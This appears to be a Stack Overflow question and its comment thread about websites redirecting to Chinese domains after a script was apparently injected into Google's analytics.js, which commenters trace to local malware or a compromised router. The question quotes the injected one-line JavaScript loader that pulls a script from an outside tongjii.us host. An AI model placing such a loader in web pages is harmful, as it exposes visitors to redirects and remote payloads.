# Google Analytics load malicious files, many sites auto redirect?

Tags: javascript, google-analytics

Recently, I have seen many websites (even Stackoverflow, Microsoft...) auto-redirected to sites in China (jiayijiayi...).

It starts in Google's `analytics.js` file.  When I browse to http://www.google-analytics.com/analytics.js I see:
[image]

The first line is pretty strange:

`var _hmt_en=_hmt_en||[];(function(){var a=document.createElement("script");a.src="http://cdn.tongjii.us/tongji/tongji.js";var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b)})();`

The `tongji.js` script then loads other scripts:

[image]

I'm not sure if this is a Google problem or one specific to my computer.  I have Bitdefender Internet Security trial and reinstalled Windows recently.  This is also occurring on other mobile devices.

Comment: Your computer has some sort of malware that is injecting stuff into each web page.  It could be a browser add-on or regular malware.

Comment: All my devices, laptop, android smartphones occur that too... Bitdefender system scan clean!

Comment: It could be your router or your ISP is compromised.  Try your smartphones on cellular data, not on your WiFi.  And, take a laptop to some   outside WiFi (like a coffee shop) and try it there.

Comment: What country are you living? This looks like a serious problem.

Comment: I have reset modem, change to new one but it's still occur !! (less intensity)

Comment: Looks like this problem gone after I reset my modem, the last time it occur maybe because I haven't cleared cache... Thanks for useful advices.